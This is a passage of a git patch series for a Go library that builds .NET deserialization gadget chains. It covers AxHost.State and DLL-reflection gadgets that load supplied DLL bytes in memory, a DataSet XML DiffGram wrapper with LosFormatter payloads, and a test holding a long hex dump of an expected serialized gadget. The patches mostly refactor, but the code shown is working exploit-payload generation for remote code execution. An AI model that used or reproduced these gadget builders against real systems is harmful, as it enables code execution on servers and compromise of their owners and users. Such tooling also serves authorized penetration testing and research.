656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e0000000952000000065b0000000847657454797065730a014500000043000000095b000000093e0000000952000000065e0000001853797374656d2e547970655b5d2047657454797065732829065f0000001853797374656d2e547970655b5d2047657454797065732829080000000a0146000000420000000660000000b60353797374656d2e46756e6360325b5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261626c6560315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e0000000662000000840153797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261626c6560315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d06630000000d476574456e756d657261746f720a0147000000430000000963000000093e000000096200000006660000004553797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b53797374656d2e547970655d20476574456e756d657261746f7228290667000000940153797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d20476574456e756d657261746f722829080000000a0148000000420000000668000000c00253797374656d2e46756e6360325b5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e426f6f6c65616e2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e000000066a0000001e53797374656d2e436f6c6c656374696f6e732e49456e756d657261746f72066b000000084d6f76654e6578740a014900000043000000096b000000093e000000096a000000066e00000012426f6f6c65616e204d6f76654e6578742829066f0000001953797374656d2e426f6f6c65616e204d6f76654e6578742829080000000a014a000000420000000670000000bd0253797374656d2e46756e6360325b5b53797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d2c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e0000000672000000840153797374656d2e436f6c6c656374696f6e732e47656e657269632e49456e756d657261746f7260315b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d06730000000b6765745f43757272656e740a014b000000430000000973000000093e000000097200000006760000001953797374656d2e54797065206765745f43757272656e74282906770000001953797374656d2e54797065206765745f43757272656e742829080000000a014c000000420000000678000000c60153797374656d2e46756e6360325b5b53797374656d2e547970652c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d2c5b53797374656d2e4f626a6563742c206d73636f726c69622c2056657273696f6e3d342e302e302e302c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d623737613563353631393334653038395d5d093e0000000a093e000000067a0000001053797374656d2e416374697661746f72067b0000000e437265617465496e7374616e63650a014d00000043000000097b000000093e000000097a000000067e0000002953797374656d2e4f626a65637420437265617465496e7374616e63652853797374656d2e5479706529067f0000002953797374656d2e4f626a65637420437265617465496e7374616e63652853797374656d2e5479706529080000000a014e0000000f00000006800000002653797374656d2e436f6d706f6e656e744d6f64656c2e44657369676e2e436f6d6d616e64494404000000093a000000104f00000002000000098200000008080020000004820000000b53797374656d2e477569640b000000025f61025f62025f63025f64025f65025f66025f67025f68025f69025f6a025f6b000000000000000000000008070702020202020202021313d274ee2ad1118bfb00a0c90f26f70b0b" {
 		t.Fatalf("Invalid CreateAxHostStateDLL output... val: %q hexform: %02x\n", got, got)
 	}
 }
+
+func TestPrimToString(t *testing.T) {
+	got := PrimitiveInt16(10990).PrimToString() //  expected hex ref ee
+	if fmt.Sprintf("%02x", got) != "ee2a" {
+		t.Fatalf("Invalid PrimToString output... val: %q hexform: %02x\n", got, got)
+	}
+}

From f1b9090353a2b3cf63265b7d3be45abdeb4a414d Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Fri, 25 Jul 2025 03:55:58 -0600
Subject: [PATCH 4/7] generalized the wrapper logic for new gadgets

---
 dotnet/dotnetgadget.go | 14 +++++---------
 1 file changed, 5 insertions(+), 9 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index fb0e8c3..439b4af 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -1046,7 +1046,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	}
 }
 
-func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
+func CreateDataSetXMLDiffGram(payloadIn string) (string, bool) {
 	name0 := random.RandLettersRange(3, 9)
 	name1 := random.RandLettersRange(3, 9)
 	name2 := random.RandLettersRange(3, 9)
@@ -1066,13 +1066,9 @@ func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
                 </xs:element>
             </xs:schema>`
 
-	innerTypeConfuseDelegate, ok := CreateTypeConfuseDelegate(program, args, LOSFormatter)
-	if !ok {
-		return "", false
-	}
-	b64String := make([]byte, base64.StdEncoding.EncodedLen(len(innerTypeConfuseDelegate)))
-	base64.StdEncoding.Encode(b64String, []byte(innerTypeConfuseDelegate))
-	innerTypeConfuseDelegateBase64 := string(b64String)
+	b64String := make([]byte, base64.StdEncoding.EncodedLen(len(payloadIn)))
+	base64.StdEncoding.Encode(b64String, []byte(payloadIn))
+	payloadB64 := string(b64String)
 
 	string1 := `<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
                 <` + name0 + `>
@@ -1083,7 +1079,7 @@ func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
                                 <ProjectedProperty0>
                                     <MethodName>Deserialize</MethodName>
                                     <MethodParameters>
-                                        <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">` + innerTypeConfuseDelegateBase64 + `</anyType>
+                                        <anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">` + payloadB64 + `</anyType>
                                     </MethodParameters>
                                     <ObjectInstance xsi:type="LosFormatter"></ObjectInstance>
                                 </ProjectedProperty0>

From 589711a651e6bf71515f955c4e08f94e11074ff1 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Fri, 25 Jul 2025 04:34:18 -0600
Subject: [PATCH 5/7] removed comments that were no longer needed

---
 dotnet/dotnetgadget.go | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index 439b4af..a9b18df 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -467,8 +467,8 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 				ObjectID: 45,
 				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
 			},
-			4,                                // Val1 as int32
-			MemberReferenceRecord{IDRef: 34}, // Val2
+			4,
+			MemberReferenceRecord{IDRef: 34},
 		},
 	}
 	records = append(records, classWithIDRecordID21)
@@ -919,7 +919,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 			MemberReferenceRecord{IDRef: 0x72},
 			BinaryObjectRecord{ObjectID: 0x76, Value: "System.Type get_Current()"},
 			BinaryObjectRecord{ObjectID: 0x77, Value: "System.Type get_Current()"},
-			8, // Corresponds with referenced, like classWithID18
+			8,
 			ObjectNullRecord{},
 		},
 	}
@@ -951,7 +951,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 			MemberReferenceRecord{IDRef: 0x7a},
 			BinaryObjectRecord{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"},
 			BinaryObjectRecord{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"},
-			8, // Corresponds with referenced, like classWithID18
+			8,
 			ObjectNullRecord{},
 		},
 	}
@@ -1010,9 +1010,9 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 		},
 		MemberTypeInfo: ID130MemberTypeInfo,
 		MemberValues: []interface{}{
-			PrimitiveInt32(1959924499), //  expected hex ref just in case I screwed this up: 13 13 d2 74
-			PrimitiveInt16(10990),      //  expected hex ref ee 2a
-			PrimitiveInt16(4561),       // expected hex ref d1 11
+			PrimitiveInt32(1959924499),
+			PrimitiveInt16(10990),
+			PrimitiveInt16(4561),
 			PrimitiveByte(0x8b),
 			PrimitiveByte(0xfb),
 			PrimitiveByte(0x00),

From 01c510f0eaf909499fda1200bed500fa20096f34 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Fri, 25 Jul 2025 12:12:30 -0600
Subject: [PATCH 6/7] some basic cleanup

---
 dotnet/dotnetgadget.go  | 19 ++++++++++---------
 dotnet/general_types.go |  4 ++--
 dotnet/records.go       | 19 +++++++------------
 3 files changed, 19 insertions(+), 23 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index a9b18df..0ac8961 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -109,7 +109,7 @@ func IsValidXML(data []byte) bool {
 	return xml.Unmarshal(data, new(interface{})) == nil
 }
 
-func CreateAxHostStateDLL(DLLBytes []byte, formatter string) (string, bool) {
+func CreateAxHostStateDLL(dllBytes []byte, formatter string) (string, bool) {
 	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	className := "System.Windows.Forms.AxHost+State"
 	memberNames := []string{"PropertyBagBinary"}
@@ -119,7 +119,7 @@ func CreateAxHostStateDLL(DLLBytes []byte, formatter string) (string, bool) {
 		"PrimitiveArray",
 	}
 
-	innerNewGadget, ok := CreateDLLReflection(DLLBytes, BinaryFormatter)
+	innerNewGadget, ok := CreateDLLReflection(dllBytes, BinaryFormatter)
 	if !ok {
 		return "", false
 	}
@@ -161,11 +161,13 @@ func CreateAxHostStateDLL(DLLBytes []byte, formatter string) (string, bool) {
 		return payload, true
 	default:
 		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+
 		return "", false
 	}
 }
 
-func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
+// Serves a DLL in memory, can be used with CreateAxHostStateDLL and possibly elsewhere.
+func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	// This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one.
 	var finalGadget string
 	var records []Record
@@ -200,8 +202,6 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	var arraySingleObjectMemberValues []interface{}
 
 	/// Building inner types for the array
-	// E  | objectid    | BT |   RANK      |Lengths      | TE | AdditionalInfo
-	// 07 | 03 00 00 00 | 01 | 01 00 00 00 | 01 00 00 00 | 07 | 02
 	binaryArrayRecord := BinaryArrayRecord{
 		ObjectID:            3,
 		BinaryArrayTypeEnum: 1, // 1byte
@@ -343,9 +343,9 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 
 	// ASP ID 13
 	arraySinglePrimitiveID13 := ArraySinglePrimitiveRecord{
-		ArrayInfo:         ArrayInfo{ObjectID: 13, MemberCount: len(DLLBytes)},
+		ArrayInfo:         ArrayInfo{ObjectID: 13, MemberCount: len(dllBytes)},
 		PrimitiveTypeEnum: PrimitiveTypeEnum["Byte"],
-		Members:           string([]byte(DLLBytes)),
+		Members:           string(dllBytes),
 	}
 	records = append(records, arraySinglePrimitiveID13)
 
@@ -925,7 +925,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	}
 	records = append(records, classWithIDRecordID75)
 
-	// CW O80 DONE
+	// CW O80
 	classWithIDRecordID80 := ClassWithIDRecord{
 		ObjectID:   0x4c,
 		MetadataID: 0x42,
@@ -982,7 +982,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 	}
 	records = append(records, arraySingleObjectID79)
 
-	//SCWMT O130
+	// SCWMT O130
 	ID130MemberNames := []string{"_a", "_b", "_c", "_d", "_e", "_f", "_g", "_h", "_i", "_j", "_k"}
 	ID130MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive"}, ID130MemberNames, []interface{}{
 		PrimitiveTypeEnum["Int32"],
@@ -1042,6 +1042,7 @@ func CreateDLLReflection(DLLBytes []byte, formatter string) (string, bool) {
 		return finalGadget, true
 	default:
 		output.PrintFrameworkError("Invalid formatter chosen, this formatter supports: 'LOSFormatter', and 'BinaryFormatter'")
+
 		return "", false
 	}
 }
diff --git a/dotnet/general_types.go b/dotnet/general_types.go
index 907b01c..413cdd9 100644
--- a/dotnet/general_types.go
+++ b/dotnet/general_types.go
@@ -28,7 +28,7 @@ func (me PrimitiveInt16) PrimToString() string {
 
 // A placeholder for lesser-used objects such as Single
 // Whatever you give it, will be placed in the stream exactly as given
-// Can't just pass a string because it will get 'processed' as a lengthPrefixedString, this avoids that
+// Can't just pass a string because it will get 'processed' as a lengthPrefixedString, this avoids that.
 func (me PrimitiveByteString) PrimToString() string {
 	return string(me)
 }
@@ -189,7 +189,7 @@ func getMemberTypeInfo(memberTypes []string, memberNames []string, additionalInf
 }
 
 // Gives us the expected expected binary string representation.
-// MemberTypeInfo output order: byteTypeEnums[]byte + []AdditionalInfo
+// MemberTypeInfo output order: byteTypeEnums[]byte + []AdditionalInfo.
 func (memberTypeInfo MemberTypeInfo) ToBin() (string, bool) {
 	dataSequence := ""
 	// build the array of binarytypeenums
diff --git a/dotnet/records.go b/dotnet/records.go
index 37ff2b1..a2d58c9 100644
--- a/dotnet/records.go
+++ b/dotnet/records.go
@@ -24,7 +24,7 @@ type MemberPrimitiveTypedRecord struct {
 type BinaryArrayRecord struct {
 	ObjectID            int
 	BinaryArrayTypeEnum int // 1byte
-	Rank                int // >=0
+	Rank                int
 	Lengths             []int
 	LowerBounds         []int
 	TypeEnum            int // 1byte
@@ -138,19 +138,19 @@ func (serializationHeaderRecord SerializationHeaderRecord) GetRecordType() int {
 }
 
 func (binaryLibraryRecord BinaryLibraryRecord) GetRecordType() int {
-	return RecordTypeEnumMap["BinaryLibrary"] // must be 12 for binaryLibraryRecord
+	return RecordTypeEnumMap["BinaryLibrary"]
 }
 
 func (memberReferenceRecord MemberReferenceRecord) GetRecordType() int {
-	return RecordTypeEnumMap["MemberReference"] // must be 12 for binaryLibraryRecord
+	return RecordTypeEnumMap["MemberReference"]
 }
 
 func (memberPrimitiveTypedRecord MemberPrimitiveTypedRecord) GetRecordType() int {
-	return RecordTypeEnumMap["MemberPrimitiveTyped"] // must be 12 for binaryLibraryRecord
+	return RecordTypeEnumMap["MemberPrimitiveTyped"]
 }
 
 func (objectNullRecord ObjectNullRecord) GetRecordType() int {
-	return RecordTypeEnumMap["ObjectNull"] // must be 12 for binaryLibraryRecord
+	return RecordTypeEnumMap["ObjectNull"]
 }
 
 // This one is different from the other recordbecause it usually is not processed within the 'context' of the member values, and needs to be called with information that is not present.
@@ -321,7 +321,7 @@ func (binaryArrayRecord BinaryArrayRecord) ToRecordBin() (string, bool) {
 			return "", false
 		}
 
-		typeInt, ok := addInfo.(int) // it seems these are primitive type enum values
+		typeInt, ok := addInfo.(int)
 		if ok {
 			addInfoString += string(byte(typeInt))
 
@@ -369,12 +369,6 @@ func (arraySingleObjectRecord ArraySingleObjectRecord) ToRecordBin() (string, bo
 
 			continue
 		}
-		//memberString, ok := member.(string)
-		//if ok {
-		//memberValuesString += memberString
-
-		//continue
-		//}
 	}
 
 	return recordByteString + objectIDString + memberCount + memberValuesString, true
@@ -394,6 +388,7 @@ func (objectNullMultiple256Record ObjectNullMultiple256Record) ToRecordBin() (st
 	nullCountString := string(byte((objectNullMultiple256Record.NullCount)))
 	if objectNullMultiple256Record.NullCount > 255 || objectNullMultiple256Record.NullCount < 0 {
 		output.PrintFrameworkError("Invalid value for objectNullMultiple256Record.NullCount, MUST be between 0-255 (inclusive)")
+
 		return "", false
 	}
 

From 20c507165e2dc4bd5ab218655590af6a80b4e674 Mon Sep 17 00:00:00 2001
From: lobsterjerusalem <work@nday.dev>
Date: Mon, 28 Jul 2025 15:10:09 -0600
Subject: [PATCH 7/7] replaced interface{} with any

---
 dotnet/dotnetgadget.go  | 196 ++++++++++++++++++++--------------------
 dotnet/formatters.go    |   4 +-
 dotnet/general_types.go |   6 +-
 dotnet/records.go       |  12 +--
 4 files changed, 109 insertions(+), 109 deletions(-)

diff --git a/dotnet/dotnetgadget.go b/dotnet/dotnetgadget.go
index 0ac8961..3224263 100644
--- a/dotnet/dotnetgadget.go
+++ b/dotnet/dotnetgadget.go
@@ -106,15 +106,15 @@ func TextFormattingRunPropertiesBinaryFormatter(cmd string) string {
 }
 
 func IsValidXML(data []byte) bool {
-	return xml.Unmarshal(data, new(interface{})) == nil
+	return xml.Unmarshal(data, new(any)) == nil
 }
 
 func CreateAxHostStateDLL(dllBytes []byte, formatter string) (string, bool) {
 	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	className := "System.Windows.Forms.AxHost+State"
 	memberNames := []string{"PropertyBagBinary"}
-	additionalInfo := []interface{}{PrimitiveTypeEnum["Byte"]}
-	memberValues := []interface{}{MemberReferenceRecord{IDRef: 3}}
+	additionalInfo := []any{PrimitiveTypeEnum["Byte"]}
+	memberValues := []any{MemberReferenceRecord{IDRef: 3}}
 	memberTypes := []string{
 		"PrimitiveArray",
 	}
@@ -166,7 +166,7 @@ func CreateAxHostStateDLL(dllBytes []byte, formatter string) (string, bool) {
 	}
 }
 
-// Serves a DLL in memory, can be used with CreateAxHostStateDLL and possibly elsewhere.
+// Serves a DLL in memory, used by CreateAxHostStateDLL
 func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	// This one is so large that it makes more sense to just build the "final" gadget as we go, so that's what is going to happen with this one.
 	var finalGadget string
@@ -178,7 +178,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	// SCWMT OBJECTID 1
 	binaryLibrary := BinaryLibraryRecord{ID: 2, Library: "System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"}
 	memberNames := []string{"_items", "_size", "_version"}
-	memberTypeInfo, ok := getMemberTypeInfo([]string{"ObjectArray", "Primitive", "Primitive"}, memberNames, []interface{}{PrimitiveTypeEnum["Int32"], PrimitiveTypeEnum["Int32"]})
+	memberTypeInfo, ok := getMemberTypeInfo([]string{"ObjectArray", "Primitive", "Primitive"}, memberNames, []any{PrimitiveTypeEnum["Int32"], PrimitiveTypeEnum["Int32"]})
 	if !ok {
 		return "", false
 	}
@@ -190,7 +190,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: memberNames,
 		},
 		MemberTypeInfo: memberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			MemberReferenceRecord{IDRef: 2},
 			PrimitiveInt32(0x0a),
 			PrimitiveInt32(0x0a),
@@ -199,7 +199,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	records = append(records, systemClassWithMembersAndTypesID1)
 
 	// ASO OBJ 2
-	var arraySingleObjectMemberValues []interface{}
+	var arraySingleObjectMemberValues []any
 
 	/// Building inner types for the array
 	binaryArrayRecord := BinaryArrayRecord{
@@ -208,14 +208,14 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 		Rank:                1, // >=0
 		Lengths:             []int{1},
 		TypeEnum:            BinaryTypeEnumerationMap["PrimitiveArray"], // 1byte
-		AdditionalTypeInfo:  []interface{}{PrimitiveTypeEnum["Byte"]},
+		AdditionalTypeInfo:  []any{PrimitiveTypeEnum["Byte"]},
 	}
 
 	// binlib
 	binaryLibrary1 := BinaryLibraryRecord{ID: 14, Library: "System.Workflow.ComponentModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"}
 
 	// InnerClassValue
-	memberTypeInfoID4, ok := getMemberTypeInfo([]string{"SystemClass", "ObjectArray"}, []string{"type", "memberDatas"}, []interface{}{"System.UnitySerializationHolder"})
+	memberTypeInfoID4, ok := getMemberTypeInfo([]string{"SystemClass", "ObjectArray"}, []string{"type", "memberDatas"}, []any{"System.UnitySerializationHolder"})
 	if !ok {
 		return "", false
 	}
@@ -228,7 +228,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 		},
 		MemberTypeInfo: memberTypeInfoID4,
 		LibraryID:      14,
-		MemberValues:   []interface{}{MemberReferenceRecord{IDRef: 0x0f}, MemberReferenceRecord{IDRef: 0x10}},
+		MemberValues:   []any{MemberReferenceRecord{IDRef: 0x0f}, MemberReferenceRecord{IDRef: 0x10}},
 		BinaryLibrary:  binaryLibrary,
 	}
 
@@ -236,7 +236,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID5 := ClassWithIDRecord{
 		ObjectID:     5,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 17}, MemberReferenceRecord{IDRef: 18}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 17}, MemberReferenceRecord{IDRef: 18}},
 	}
 
 	// Add value types to create/finish this ASO record
@@ -265,7 +265,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID6 := ClassWithIDRecord{
 		ObjectID:     6,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 19}, MemberReferenceRecord{IDRef: 20}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 19}, MemberReferenceRecord{IDRef: 20}},
 	}
 	records = append(records, classWithIDRecordID6)
 
@@ -273,7 +273,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID7 := ClassWithIDRecord{
 		ObjectID:     7,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 21}, MemberReferenceRecord{IDRef: 22}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 21}, MemberReferenceRecord{IDRef: 22}},
 	}
 	records = append(records, classWithIDRecordID7)
 
@@ -281,7 +281,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID8 := ClassWithIDRecord{
 		ObjectID:     8,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 23}, MemberReferenceRecord{IDRef: 24}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 23}, MemberReferenceRecord{IDRef: 24}},
 	}
 	records = append(records, classWithIDRecordID8)
 
@@ -289,7 +289,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID9 := ClassWithIDRecord{
 		ObjectID:     9,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 25}, MemberReferenceRecord{IDRef: 26}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 25}, MemberReferenceRecord{IDRef: 26}},
 	}
 	records = append(records, classWithIDRecordID9)
 
@@ -297,7 +297,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID10 := ClassWithIDRecord{
 		ObjectID:     10,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 27}, MemberReferenceRecord{IDRef: 28}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 27}, MemberReferenceRecord{IDRef: 28}},
 	}
 	records = append(records, classWithIDRecordID10)
 
@@ -305,13 +305,13 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID11 := ClassWithIDRecord{
 		ObjectID:     11,
 		MetadataID:   4,
-		MemberValues: []interface{}{MemberReferenceRecord{IDRef: 29}, MemberReferenceRecord{IDRef: 30}},
+		MemberValues: []any{MemberReferenceRecord{IDRef: 29}, MemberReferenceRecord{IDRef: 30}},
 	}
 	records = append(records, classWithIDRecordID11)
 
 	// SystemClassWithMembersAndTypesID12
 	ID12MemberNames := []string{"LoadFactor", "Version", "Comparer", "HashCodeProvider", "HashSize", "Keys", "Values"}
-	ID12MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "SystemClass", "SystemClass", "Primitive", "ObjectArray", "ObjectArray"}, ID12MemberNames, []interface{}{
+	ID12MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "SystemClass", "SystemClass", "Primitive", "ObjectArray", "ObjectArray"}, ID12MemberNames, []any{
 		PrimitiveTypeEnum["Single"],
 		PrimitiveTypeEnum["Int32"],
 		"System.Collections.IComparer",
@@ -329,7 +329,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID12MemberNames,
 		},
 		MemberTypeInfo: ID12MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			PrimitiveByteString("\xec\x51\x38\x3f"), // This is the 'Single' type
 			PrimitiveInt32(2),
 			ObjectNullRecord{},
@@ -351,7 +351,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 
 	// SystemClassWithMembersAndTypesID15
 	ID15MemberNames := []string{"Data", "UnityType", "AssemblyName"}
-	ID15MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "Primitive", "String"}, ID15MemberNames, []interface{}{
+	ID15MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "Primitive", "String"}, ID15MemberNames, []any{
 		PrimitiveTypeEnum["Int32"],
 	})
 
@@ -366,7 +366,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			MemberNames: ID15MemberNames,
 		},
 		MemberTypeInfo: ID15MemberTypeInfo,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
 			PrimitiveInt32(4),
 			BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"},
@@ -380,7 +380,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 			ObjectID:    16,
 			MemberCount: 7,
 		},
-		Members: []interface{}{
+		Members: []any{
 			MemberReferenceRecord{IDRef: 3},
 			ObjectNullRecord{},
 			MemberReferenceRecord{IDRef: 36},
@@ -396,7 +396,7 @@ func CreateDLLReflection(dllBytes []byte, formatter string) (string, bool) {
 	classWithIDRecordID17 := ClassWithIDRecord{
 		ObjectID:   17,
 		MetadataID: 15,
-		MemberValues: []interface{}{
+		MemberValues: []any{
 			BinaryObjectRecord{
 				ObjectID: 37,
